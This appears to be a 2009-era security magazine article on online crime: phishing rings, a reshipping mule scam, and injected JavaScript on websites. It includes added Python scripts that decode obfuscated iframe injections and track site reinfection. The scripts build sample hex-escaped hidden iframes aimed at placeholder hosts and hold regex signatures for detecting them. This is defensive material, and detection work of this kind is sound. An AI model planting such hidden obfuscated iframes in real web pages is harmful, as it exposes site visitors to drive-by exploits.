Online crime is evolving rapidly, and in an ever more sophisticated and advanced manner, worldwide. This article gives you a wide view of the current state of online crime and of the technological and methodological advances in this space.
An unknown Indian hacker was charged with the greatest cyber-heist in history in 2008, for allegedly helping a criminal gang steal identities of an estimated eight million people in a hacking raid that could ultimately net more than £2.8 billion in illegal funds.
An investigation by Scotland's Sunday Herald newspaper discovered that late on a Thursday night, a previously unknown Indian hacker successfully breached the IT defences of the UK Best Western Hotel group's online booking system. He then sold details of how to access it through an underground network operated by the Russian mafia.
The attack scooped up the personal details of every single customer who had booked into one of Best Western's 1312 continental hotels since 2007. Amounting to a complete identity-theft kit, the stolen data included a range of private information such as home addresses, telephone numbers, credit card details and place of employment.
In another incident, in October this year, US and Egyptian authorities charged 100 people with conducting a phishing operation that siphoned at least $1.5m from thousands of accounts belonging to Bank of America and Wells Fargo customers. Fifty-three defendants from California, Nevada and North Carolina were named in a federal indictment unsealed on Wednesday. Prosecutors said it was the largest number of defendants ever charged in a cybercrime case. Authorities in Egypt charged an additional 47 people.
According to the indictment, the Egypt-based defendants phished individuals' personal information and then used it to access victims' bank accounts. The phishers then worked with their counterparts in the US so money could be transferred into fraudulent accounts created specifically to receive the stolen funds.
These are just a few shocking examples of today's horrifying online crime. The latest reports confirm that the web is now an integral tool for criminals looking to make money (not merely mischief). Malware-infected systems are used as networks of bots for a wide variety of illicit activities.
Why is online crime on the rise?
Online criminals are quieter and sneakier. They have realized that committing crimes over the Internet has certain advantages. Firstly, online crime is low risk: since it transcends geo-political borders, it is difficult for law enforcement agencies to catch the perpetrators. Moreover, the costs of conducting cross-border investigations and prosecutions can be high, meaning this is only worth doing in major cases. Secondly, online crime is easy: there is extensive documentation on hacking and virus writing freely available on the Internet, meaning that no sophisticated knowledge or skill is required. These are the two main factors which have led to online crime becoming a multi-billion dollar industry, truly a self-sustaining ecosystem of its own.
Internet fraud losses reported in the United States reached a record high $264.6 million in 2008, according to a report released from the Internet Fraud Complaint Center, run by the FBI and the National White Collar Crime Center. Online scams originating from across the globe -- mostly from the United States, Canada, Britain, Nigeria and China -- are gathering steam this year with a nearly 50 percent increase in complaints reported to U.S. authorities in March 2009 alone.
Fraudulent sales on online auction sites like eBay Inc and classified sites like craigslist.com contributed to a 32 percent rise in the hottest area of online fraud -- non-delivery of promised merchandise, the report said. Other important areas included investment scams such as mini-versions of the $65 billion Ponzi scheme committed by New York financier Bernard Madoff in which money from new investors is used to pay existing investors.
About 74 percent of the scams were carried out through e-mail messages last year, especially spam, while about 29 percent used websites. But criminals were increasingly tapping new technologies such as social networking sites and instant messenger services, said Kane. The report highlights one new "significant" identity-theft scam involving e-mail messages that give the appearance of originating from the FBI but seek bank account information to help in investigations of money being transferred to Nigeria. Recipients of the e-mails are told they could be richly rewarded by cooperating.
Both security companies and software developers wage a constant battle with online criminals; their aim is to develop protection for Internet users and software that is secure. Of course, online criminals constantly change their tactics in order to combat these countermeasures, and this has resulted in two marked current trends.
First of all, there is the deployment of malware using 0-day vulnerabilities. 0-day vulnerabilities are vulnerabilities for which a patch is not yet available, and they can be used to infect even fully up-to-date computer systems which are not running a dedicated security solution. 0-day vulnerabilities are a valuable commodity due to their potentially serious impact, and they usually sell for tens of thousands of dollars on the black market.
Secondly, experts are witnessing a spike in the type of malware designed to steal confidential information that can later be sold on the black market. Such information includes credit card numbers, bank account details, passwords for websites such as eBay or PayPal, and even passwords for online games such as World of Warcraft.
One of the obvious reasons why online crime has become so widespread is that it is profitable; this profitability will always drive the development of new online crime technologies.
Box Item — 1
India 5th in Online Crime Worldwide
India ranks fifth among countries reporting the maximum number of cyber crimes, the latest report released by Internet Crime Complaint Centre of the United States has said.
The US report analyzing internet crime in 2008, compiled by experts from the FBI, the Internet Crime Complaint Centre (IC3) and other agencies, shows that the number of complaints from victims shot up by almost a third since 2007, with the total touching 275,284 cases in which about USD 265 million were lost globally.
The United States led the tally of victims' complaints, while India remained fifth by reporting 0.36 per cent of the global complaints received at IC3, which was about 1,000 complaints, the data said. The majority of the fraudsters on the information highway, this year, resorted to the trick of selling products online but not delivering them to buyers who had already made payments.
The United States led the tally in terms of perpetrators as well as complainants. About two-thirds of fraudsters and 93 per cent of victims were from the United States. The United Kingdom came second in the chart of fraudsters, with 10 per cent of them being tracked in the island nation. The data shows young men remain most gullible to such crimes, as about 55 per cent of the victims were reported to be men, with half of them being in the age group of 30 to 50 years.
How Big is the Threat?
Online crime is constantly evolving and fraudsters do not discriminate against any organization or person. Online attacks involving phishing, pharming and Trojans represent one of the most organized and sophisticated technological crime waves worldwide. Online criminals work day and night to steal identities, online credentials, credit card information, or any other information that they can efficiently monetize. They target organizations in all sectors, as well as any person who uses the Internet at work or at home.
Since last fall the RSA FraudAction Research Lab has tracked several different reshipping scams engineered by online fraudsters to “cash out” merchandise purchased using stolen payment cards through the involvement of mules. We will profile one such scam in-depth – Air Parcel Express – that was discovered by RSA.
The RSA FraudAction Research Lab uncovered the true inner workings of Air Parcel Express – a large scale, centralized reshipping service operated by criminals. The Lab researched and gathered information regarding its operation, the details of which are revealed below. This information should help Internet users and the security community better understand this threat and the mechanisms behind it.
The reshipping scam used a legitimate-looking website to recruit drops. As shown in Figure 1, the website designed by the criminals behind the operation was meant to lend credibility to a fictitious shipping company, Air Parcel Express, Inc. The website featured in Figure 1 is no longer active. This was never a legitimate firm.
Figure 1: AirParcelExpress.net's home page
While "AirParcelExpress.net" was the front-end to what was meant to look like a legitimate business, a management tool located on another website served as its back-end operation. The management tool enabled the scammers to manage the mules they recruited, and also provided their customers with the ability to track the merchandise they had previously carded, as well as the mules assigned to carry out the rest of their operation.
After a customer signed up for the reshipping service, he could log in to the management tool using a username and password. RSA is aware of at least twenty-five customers that registered for the service. After registration, every customer was assigned one or more mules – in some cases up to twenty mules at a time. At the time of the analysis of this particular reshipping scam, 20 mules appeared to be active.
The mules recruited by the scammers behind Air Parcel Express reshipped the merchandise they received to addresses in Russia and Belarus. The recipients were either the scammers themselves or accomplices who received packages on behalf of the scammers. Once the packages reached their destinations, the merchandise they contained was likely resold on auction websites like eBay and through other means, and the scammers forwarded a predetermined share of the proceeds to their customers.
RSA experts could not exactly ascertain the value of the reshipped merchandise through Air Parcel Express but they have made some rough estimates:
– If most of the customers follow the classic 30/70 split of the profits offered by the scammers, about USD 6,000 was paid to nine fraudster customers.
– This represents approximately one-third of the total merchandise value; just over USD 18,000.
– Since it can take up to two weeks to card an item to a U.S. address and then have it reshipped to another country, RSA estimates that over USD 36,000 worth of merchandise was cashed out every month during its operation.
Statistics
In addition to the developments described above, another marked trend in online crime is the distribution of malware via the World Wide Web, which in recent years has become the main distribution point for malware. Malicious programs are hosted on websites; users are then either tricked into running these programs manually, or exploits are used to execute the malware automatically on victim machines.
Over the past three years, we've monitored between 100,000 and 300,000 otherwise "clean" websites in order to identify when they become distribution points for malware. The number of websites monitored has grown over time as more domains have been registered.
Table: maximum recorded infection rate of monitored websites, 2006 to 2009
The table above shows the maximum recorded infection rate for monitored websites throughout the year. There has been a sharp rise from the roughly 1 infected website in every 20,000 or so websites in 2006 to the current maximum of 1 infected website in every 150 at the beginning of 2009. The percentage of infected websites fluctuates at around this number. This may mean saturation point has been reached, where all the websites that can be infected have been. However, the number rises and falls as new vulnerabilities and tools are discovered that allow attackers to take over new hosts.
The next two tables show the malware most commonly detected on websites in 2008 and 2009.
Top 10 infections - 2008
Top 10 infections - 2009
In 2008, Trojan-Clicker.JS.Agent.h was found in the vast majority of cases, followed closely by Trojan-Downloader.JS.Iframe.oj.
Example of a page source infected with Trojan-Clicker.JS.Agent.h
Decoded Trojan-Clicker.JS.Agent.h
Trojan-Clicker.JS.Agent.h is a typical example of what most website malware injections looked like in 2008 and still look like in 2009. A small fragment of JavaScript code is added, which is usually obfuscated to prevent analysis. In the code shown above, the obfuscation simply consists of the ASCII characters which form the malicious code being converted into their hex codes. Once decoded, the code is usually an iframe which leads to a website hosting exploits. The IP address will vary and there are many deployment points. The entry page in the malicious website usually hosts exploits for IE, Firefox and Opera. Trojan-Downloader.JS.Iframe.oj, which was the second most common piece of malware, works in a very similar way.
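The decoding step described above can be automated from the defender's side. The Python script below is an added example, not code from the original article: it undoes the \xNN and unescape('%NN') encodings and reports any iframe that only becomes visible after decoding, or that is sized 0 or 1 pixels or styled hidden. The page content and the hosts in it are constructed for the example.

```python
"""Decode hex-escaped JavaScript injections and report the iframes they hide."""
import re
import urllib.parse

# A run of eight or more \xNN escapes: an <iframe> tag with each character turned into its hex code.
HEX_RUN = re.compile(r'(?:\\x[0-9a-fA-F]{2}){8,}')
# unescape('%3C%69...') is the other common form of the same trick.
PCT_CALL = re.compile(r'unescape\(\s*[\'"]([^\'"]*%[0-9a-fA-F]{2}[^\'"]*)[\'"]\s*\)')
IFRAME_TAG = re.compile(r'<iframe\b[^>]*>', re.IGNORECASE)
ATTR = re.compile(r'(\w+)\s*=\s*(?:"([^"]*)"|\'([^\']*)\'|([^\s>]+))')

def decode_layers(text, max_rounds=5):
    """Replace \\xNN runs and unescape('%NN') calls with plain text, repeating for nested layers."""
    for _ in range(max_rounds):
        new = HEX_RUN.sub(lambda m: bytes.fromhex(m.group(0).replace('\\x', '')).decode('latin-1'), text)
        new = PCT_CALL.sub(lambda m: urllib.parse.unquote(m.group(1)), new)
        if new == text:
            break
        text = new
    return text

def iframes_in(text):
    """Yield {src, hidden} for each <iframe>; 0/1-pixel or hidden frames are the injection pattern."""
    for tag in IFRAME_TAG.findall(text):
        attrs = {m.group(1).lower(): (m.group(2) or m.group(3) or m.group(4) or '')
                 for m in ATTR.finditer(tag)}
        style = attrs.get('style', '').replace(' ', '').lower()
        hidden = (attrs.get('width') in ('0', '1') or attrs.get('height') in ('0', '1')
                  or 'hidden' in style or 'display:none' in style)
        yield {'src': attrs.get('src', ''), 'hidden': hidden}

def scan_page(html):
    """Report every iframe on the page, flagging those that only appear once the scripts are decoded."""
    visible_srcs = {f['src'] for f in iframes_in(html)}
    report = []
    for frame in iframes_in(decode_layers(html)):
        frame['obfuscated'] = frame['src'] not in visible_srcs
        report.append(frame)
    return report

# Constructed sample: a page with a legitimate ad frame and two injections appended one after the other,
# one \xNN-escaped and one percent-escaped. The hosts are placeholders, not real indicators.
def _hex_escape(s):
    return ''.join('\\x%02x' % ord(c) for c in s)

def _pct_escape(s):
    return ''.join('%%%02X' % ord(c) for c in s)

INJECT_A = '<iframe src="http://malicious.example/in.cgi?3" width=1 height=1 style="visibility: hidden"></iframe>'
INJECT_B = '<iframe src="http://second.example/x.php" width="0" height="0"></iframe>'
SAMPLE_PAGE = (
    '<html><body><h1>Welcome</h1><iframe src="/ads.html" width="300" height="250"></iframe></body></html>\n'
    '<script>document.write("' + _hex_escape(INJECT_A) + '")</script>\n'
    "<script>document.write(unescape('" + _pct_escape(INJECT_B) + "'))</script>\n"
)

if __name__ == '__main__':
    for frame in scan_page(SAMPLE_PAGE):
        print(frame)
```

Run against a saved copy of a suspect page, any frame reported as both hidden and obfuscated is the pattern described above and the host it points to is the exploit server to block.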
There were two very interesting cases in 2009, the first of which was Net-Worm.JS.Aspxor.a. Although this malware was detected back in July 2008, in 2009 it became far more widespread. It works by using a kit which finds SQL injection vulnerabilities in websites, which are then used to insert malicious iframes.
Another very interesting case is "Gumblar", named after the Chinese domain that was used as an exploitation point. The "gumblar" string, visible in the obfuscated JavaScript which is added to websites, is a clear sign that a website has been compromised.
Typical Gumblar injection in a website
Once deobfuscated, the malicious Gumblar code looks like this:
Decoded Gumblar script
The "gumblar.cn" domain has been taken down, but unfortunately, the bad guys have since switched to new domains which are being used to conduct similar attacks.
Phishing Attacks per Month: For the third consecutive month, the number of phishing attacks identified by RSA in a single month has hit a record-breaking high, reaching 17,900 attacks in October. While standard phishing attacks dropped last month by eight percent, fast-flux attacks, which are mostly launched by the Rock Phish gang, rose by 13 percent. For six consecutive months, fast-flux attacks have outnumbered attacks hosted using other methods such as hijacked websites, hijacked PCs and free or commercial web hosting services.
Figure: Phishing attacks per month. Source: RSA Anti-Fraud Command Center
Infection and distribution methods
There are currently three main ways in which websites can become infected with malware. The first popular method is to use vulnerabilities in the website itself, for instance a SQL injection, which allows the addition of malicious code. Attack tools such as ASPXor demonstrate this method: they can be used for mass scanning and injection of malware into thousands of IP addresses at a time. Such attacks can often be seen in web server access logs.
The second method involves infecting a web developer's machine with malware which monitors the creation and upload of HTML files and then injects malicious code into these files.
Finally, the last common method is to infect a web developer, or somebody else with access to the hosting account, with a password stealing Trojan (e.g. Trojan-Ransom.Win32.Agent.ey). Usually, the password stealing Trojan will contact a server via HTTP to transmit FTP account passwords which have been harvested from popular FTP tools such as FileZilla or CuteFTP. The server side component then logs the account access information in an SQL database. Later, a server side tool will go through the SQL database, log into all the FTP accounts, fetch the index page, append the Trojanized code and then re-upload the page.
Because in this last method the hosting account access details are compromised, it's quite common for websites to get infected, for the developers to notice the infection or be alerted to it by site visitors, and for the site to be cleaned, only for it to be infected again the very next day.
Example of a website (*.*.148.240) which gets infected, then cleaned, then infected again
Another common situation is when different cybercriminal groups get hold of the same vulnerability or hosting account details at the same time. A battle then begins, with each group attempting to infect the website with their piece of malware. An example of this is given below:
Sample scan report of a website (*.*.176.6) with multiple infections
On 11.06.2009, the website being monitored was clean; it was infected with Trojan-Clicker.JS.Agent.gk on 05.07.2009. Later, on 15.07.2009 a new piece of malware, Trojan-Downloader.JS.Iframe.bin, was injected into the website. Ten days later, the malware was replaced again. This is relatively common and many websites actually contain a number of pieces of malware, appended one after the other, which have been placed there by different online criminal groups.
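The monitoring described above can be scripted. The following Python is an added example, not from the original article: given a known-clean copy of the index page and dated snapshots, it labels each snapshot as clean, infected, replaced or reinfected, and flags a site that is hit again within days of being cleaned, the pattern that points at compromised hosting credentials rather than a one-off injection. The snapshots, signature names and hosts are constructed assumptions.

```python
"""Track a monitored page across dated snapshots: infection, replacement and quick reinfection."""
import re
from datetime import date

# Illustrative labels (not AV names) for the article's injection styles: hex-escaped script body,
# the 'gumblar' marker string, and a 0/1-pixel iframe.
SIGNATURES = [
    ('hex-escaped-script', re.compile(r'<script[^>]*>[^<]*(?:\\x[0-9a-fA-F]{2}){8,}', re.I)),
    ('gumblar-marker', re.compile(r'gumblar', re.I)),
    ('hidden-iframe', re.compile(r'<iframe\b[^>]*(?:width|height)\s*=\s*["\']?[01]\b', re.I)),
]

def appended_fragment(baseline, snapshot):
    """The FTP re-upload attack appends code, so the suspect part is what follows the clean copy;
    a page that no longer starts with the baseline was rewritten and is examined whole."""
    return snapshot[len(baseline):] if snapshot.startswith(baseline) else snapshot

def classify(fragment):
    return [name for name, rx in SIGNATURES if rx.search(fragment)]

def timeline(baseline, snapshots):
    """snapshots: list of (ISO date, html). Returns (date, state, labels) per snapshot; state is clean,
    infected, still-infected, replaced (different malware present) or reinfected (after a clean-up)."""
    events, previous, seen_infection = [], [], False
    for day, html in snapshots:
        labels = [] if html == baseline else classify(appended_fragment(baseline, html))
        if not labels:
            state = 'clean'
        elif not previous:
            state = 'reinfected' if seen_infection else 'infected'
        else:
            state = 'still-infected' if labels == previous else 'replaced'
        seen_infection = seen_infection or bool(labels)
        events.append((day, state, labels))
        previous = labels
    return events

def quick_reinfections(events, max_days=3):
    """(clean_date, reinfected_date) pairs where the site was hit again within max_days of a clean-up:
    the pattern that points at compromised hosting credentials rather than a one-off injection."""
    hits, last_clean = [], None
    for day, state, _ in events:
        if state == 'clean':
            last_clean = day
        elif state == 'reinfected' and last_clean is not None:
            if (date.fromisoformat(day) - date.fromisoformat(last_clean)).days <= max_days:
                hits.append((last_clean, day))
    return hits

# Constructed snapshots mirroring the sequence described above; the hosts are placeholders.
def _hx(s):  # hex-escape a string the way the injected scripts do
    return ''.join('\\x%02x' % ord(c) for c in s)

CLEAN = '<html><body><h1>Company site</h1></body></html>\n'
HEX_SCRIPT = '<script>document.write("' + _hx('<iframe src="http://first.invalid/a" width=1 height=1></iframe>') + '")</script>\n'
GUMBLAR_STYLE = '<script>var u="http://gumblar.invalid/rss/";</script>\n'
PLAIN_IFRAME = '<iframe src="http://third.invalid/x" width="0" height="0"></iframe>\n'
SNAPSHOTS = [
    ('2009-06-11', CLEAN),
    ('2009-07-05', CLEAN + HEX_SCRIPT),
    ('2009-07-15', CLEAN + GUMBLAR_STYLE),
    ('2009-07-25', CLEAN + GUMBLAR_STYLE + PLAIN_IFRAME),  # two pieces appended one after the other
    ('2009-08-01', CLEAN),                                  # cleaned by the developers
    ('2009-08-02', CLEAN + HEX_SCRIPT),                     # and hit again the very next day
]
```

A quick reinfection reported by quick_reinfections is the cue to work through the checklist in Box Item 2, starting with the hosting password, rather than just cleaning the files again.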
Distribution of Attacks by Hosting Method: The segmentation of phishing attacks according to the method used to host them remained similar in October to that of the month prior. As compared to September, attacks hosted on fast-flux networks rose three percent, as did attacks hosted on hijacked websites. Attacks hosted at commercial web hosting facilities fell four percent, while attacks hosted on hijacked computers and free hosting services both dropped one percent.
Figure: Distribution of Attacks
Top Ten Countries by Attack Volume: Overall, online criminals continue to attack brands in the same countries, with the U.S. and UK suffering a combined 9 percent of attacks in October. Attacks on Indian and Chinese brands seem to be gaining momentum within the past six months, as both countries have now appeared on this list for six and four consecutive months, respectively. Newcomers to the list in October were Greece and Malaysia, while Ireland and Spain dropped off the list completely.
Figure: Top Ten Countries by Attacks
Box Item — 2
The Checklist
Below is a checklist of actions which need to be taken whenever a website infection is detected:
- Identify everyone who has the website hosting access information; scan their systems with an up-to-date Internet security suite; remove any malware which is detected.
- Change the hosting password to a new, strong one. Strong passwords contain letters, numbers and non-alphanumeric characters to make guessing the password difficult.
- Replace all compromised files with clean copies.
- Identify any backups that might contain infected files and clean them.
Conclusion
Online crime has evolved in a very sophisticated and technically advanced way. Online criminals today have new tools at their disposal and are able to adapt more quickly than ever with advanced crimeware that is rapidly deployed using stealth mechanisms. Their supply chains have evolved to match those of the legitimate business world. There are now over a hundred times more infected websites on the Internet than three years ago. High profile, high traffic websites are a valuable commodity for online criminals, as the pool of potential victims that can be infected via such websites will be larger than usual.
For Internet users, there are several factors which increase the risk of falling victim to websites booby-trapped with malicious code. These include the use of pirated software, failure to install security patches, failure to run a security solution, and a general lack of awareness or knowledge of Internet threats. Failure to run a security solution deserves emphasis: even if the system itself is up to date, it could be infected via 0-day vulnerabilities in third party software. Security solutions are usually updated far more quickly than software patches are produced, and provide a much-needed layer of protection during the vulnerability window.
While patching is important in helping keep computers secure, the 'human factor' also plays a role. For instance, a user might try to watch a 'funny clip' s/he's downloaded from the Internet – which turns out to be malware. Some websites will actually attempt to use this trick if exploits fail to infect the system. This example shows why users need to be aware of Internet threats, and particularly those associated with Web 2.0 social networks, which have recently been increasingly targeted by online criminals.
Technology alone cannot protect your data and information from criminals unless, as a user, you possess basic security awareness and knowledge. It is very important to understand that a combined effort of technology and user awareness always produces better results than isolated efforts.
—By: Tanu Srivastava, 'InfoSecurity' Bureau.